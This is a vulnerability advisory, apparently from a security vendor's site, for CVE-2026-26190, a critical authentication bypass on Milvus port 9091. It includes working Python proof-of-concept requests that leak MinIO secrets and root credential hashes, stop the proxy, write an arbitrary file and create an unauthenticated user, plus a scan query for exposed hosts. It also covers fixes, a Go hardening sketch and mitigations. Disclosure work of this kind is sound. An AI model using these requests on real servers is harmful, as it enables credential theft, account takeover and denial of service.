CVE-2026-26190

CVE-2026-26190 is a critical-severity "missing authentication for critical function" vulnerability in github.com/milvus-io/milvus (Go). It affects versions below 2.5.27 and versions from 2.6.0 up to but not including 2.6.10; it is fixed in 2.5.27 and 2.6.10.

Summary

Milvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:

  1. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation.
  2. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.

Details

Vulnerability 1: Weak Default Authentication on /expr Endpoint

The /expr endpoint on port 9091 accepts an auth parameter that defaults to the etcd.rootPath value (by-dev). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:

  • Information/Credential Disclosure: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via param.MinioCfg.SecretAccessKey.GetValue(), rootcoord.meta.GetCredential(ctx, 'root'), etc.
  • Denial of Service: Invoking proxy.Stop() to shut down the proxy service.
  • Arbitrary File Write (potential RCE): Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.

Vulnerability 2: Unauthenticated REST API on Metrics Port

Business-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via registerHTTPServer() in internal/distributed/proxy/service.go (line 170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.

An attacker can perform any business operation without credentials, including:

  • Creating, listing, and deleting collections
  • Inserting and querying data
  • Creating, listing, and deleting user credentials
  • Modifying user passwords

Proof of Concept

PoC 1: /expr Endpoint Exploitation

import requests

url = "http://<target>:9091/expr"

# Leak sensitive configuration (e.g., MinIO secret key)
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "param.MinioCfg.SecretAccessKey.GetValue()"
}, timeout=5)
print(res.json().get("output", ""))

# Retrieve hashed credentials for the root user
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "rootcoord.meta.GetCredential(ctx, 'root')"
}, timeout=5)
print(res.json().get("output", ""))

# Denial of Service, stop the proxy
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "proxy.Stop()"
}, timeout=5)

# Arbitrary file write (potential RCE)
for cmd in [
    'param.Save("proxy.accessLog.localPath", "/tmp")',
    'param.Save("proxy.accessLog.formatters.base.format", "whoami")',
    'param.Save("proxy.accessLog.filename", "evil.sh")',
    'querycoord.etcdCli.KV.Put(ctx, "by-dev/config/proxy/accessLog/enable", "true")'
]:
    requests.get(url, params={"auth": "by-dev", "code": cmd}, timeout=5)

PoC 2: Unauthenticated REST API Access

import requests

target_url = "http://<target>:9091"

# Create a user without any authentication
res = requests.post(f"{target_url}/api/v1/credential", json={
    "username": "attacker_user",
    "password": "MTIzNDU2Nzg5",
})
print(res.json())

# List all users
res = requests.get(f"{target_url}/api/v1/credential/users")
print(res.json())  # {'status': {}, 'usernames': ['root', 'attacker_user']}

# Create and delete collections, insert data, all without authentication

Internet Exposure

A significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:

http.body="404 page not found" && port="9091"

This indicates the vulnerability is actively exploitable in real-world production environments.

Recommended Fixes

  1. Remove or disable the /expr endpoint in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.
  2. Do not register business API routes on the metrics port. Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.
  3. Bind port 9091 to localhost by default (127.0.0.1:9091) so it is not externally accessible unless explicitly configured.
  4. Enforce authentication on all API endpoints, regardless of which port they are served on.
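The structure that fixes 1 to 4 call for, sketched as an added Go example (not Milvus code): the management listener is bound to loopback and carries only operational routes, the business routes live on a separate mux that is wrapped whole in an authentication middleware, and startup refuses a token that is empty or merely equals etcd.rootPath. The names checkToken, requireBearer and newAPIMux, the API_TOKEN setting and the application port 8080 are assumptions.

```go
package main

import (
	"crypto/subtle"
	"errors"
	"net/http"
	"os"
)

// checkToken rejects the weak states the advisory describes: no token, or a
// token that is merely the etcd rootPath (by-dev by default).
func checkToken(token, rootPath string) error {
	if token == "" || token == rootPath {
		return errors.New("api token must be set and must not equal etcd.rootPath")
	}
	return nil
}

// requireBearer enforces the token on every route it wraps, whichever
// listener the route is mounted on; constant-time compare avoids timing leaks.
func requireBearer(token string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got, want := []byte(r.Header.Get("Authorization")), []byte("Bearer "+token)
		if subtle.ConstantTimeCompare(got, want) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// newAPIMux mounts the business routes and wraps the whole mux in requireBearer.
func newAPIMux(token string) http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/api/v1/credential/users", func(w http.ResponseWriter, _ *http.Request) {
		w.Write([]byte(`{"usernames":["root"]}`))
	})
	return requireBearer(token, mux)
}

func main() {
	token := os.Getenv("API_TOKEN") // assumed operator-supplied setting; no default
	if err := checkToken(token, "by-dev"); err != nil {
		panic(err)
	}
	mgmt := http.NewServeMux() // health/metrics only: no /api/v1, no /expr
	mgmt.HandleFunc("/healthz", func(w http.ResponseWriter, _ *http.Request) { w.Write([]byte("ok")) })
	go http.ListenAndServe("127.0.0.1:9091", mgmt) // loopback only; not externally reachable
	http.ListenAndServe(":8080", newAPIMux(token))  // assumed application port
}
```

Because the middleware wraps the mux rather than individual handlers, a route added later to newAPIMux cannot accidentally ship unauthenticated.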

User Mitigations (until patched)

  • Block external access to port 9091 using firewall rules or network policies.
  • If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.
  • Change the etcd.rootPath from the default value by-dev to a strong, random value (partial mitigation only, does not address the unauthenticated REST API).

Credit

This vulnerability was discovered and responsibly reported by YingLin Xie ([email protected]). It was independently reported by 0x1f and zznQ (ac0d3r).

Impact

An unauthenticated remote attacker with network access to port 9091 can:

  1. Exfiltrate secrets and credentials: MinIO keys, etcd credentials, user password hashes, and all internal configuration values.
  2. Manipulate all data: create, modify, and delete collections and insert or remove data, bypassing all application-level access controls.
  3. Manage user accounts: create administrative users, reset passwords, and escalate privileges.
  4. Cause denial of service: shut down proxy services, drop databases, or corrupt metadata.
  5. Write arbitrary files: potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.

A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.

CVE-2026-26190 has a CVSS score of 9.8 (Critical): the attack vector is network, with no privileges required and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. Fixed versions are available (2.5.27, 2.6.10); upgrading removes the vulnerable code path.

Affected versions

github.com/milvus-io/milvus (< 2.5.27)
github.com/milvus-io/milvus (>= 2.6.0, < 2.6.10)

Security releases

github.com/milvus-io/milvus → 2.5.27 (go)
github.com/milvus-io/milvus → 2.6.10 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Remediation advice

Upgrade the following packages to resolve this vulnerability:

github.com/milvus-io/milvus to 2.5.27 or later (2.5.x line)
github.com/milvus-io/milvus to 2.6.10 or later (2.6.x line)

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-26190? CVE-2026-26190 is a critical-severity "missing authentication for critical function" vulnerability in github.com/milvus-io/milvus (Go), affecting versions < 2.5.27 and versions >= 2.6.0, < 2.6.10. It is fixed in 2.5.27 and 2.6.10. A critical operation is accessible without requiring any authentication.
  2. How severe is CVE-2026-26190? CVE-2026-26190 has a CVSS score of 9.8 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/milvus-io/milvus are affected by CVE-2026-26190? github.com/milvus-io/milvus (Go) versions < 2.5.27 and versions >= 2.6.0, < 2.6.10 are affected.
  4. Is there a fix for CVE-2026-26190? Yes. CVE-2026-26190 is fixed in 2.5.27 and 2.6.10. Upgrade to one of these versions or later.
  5. Is CVE-2026-26190 exploitable, and should I be worried? Whether CVE-2026-26190 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-26190 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-26190?
    • Upgrade github.com/milvus-io/milvus to 2.5.27 or later
    • Upgrade github.com/milvus-io/milvus to 2.6.10 or later
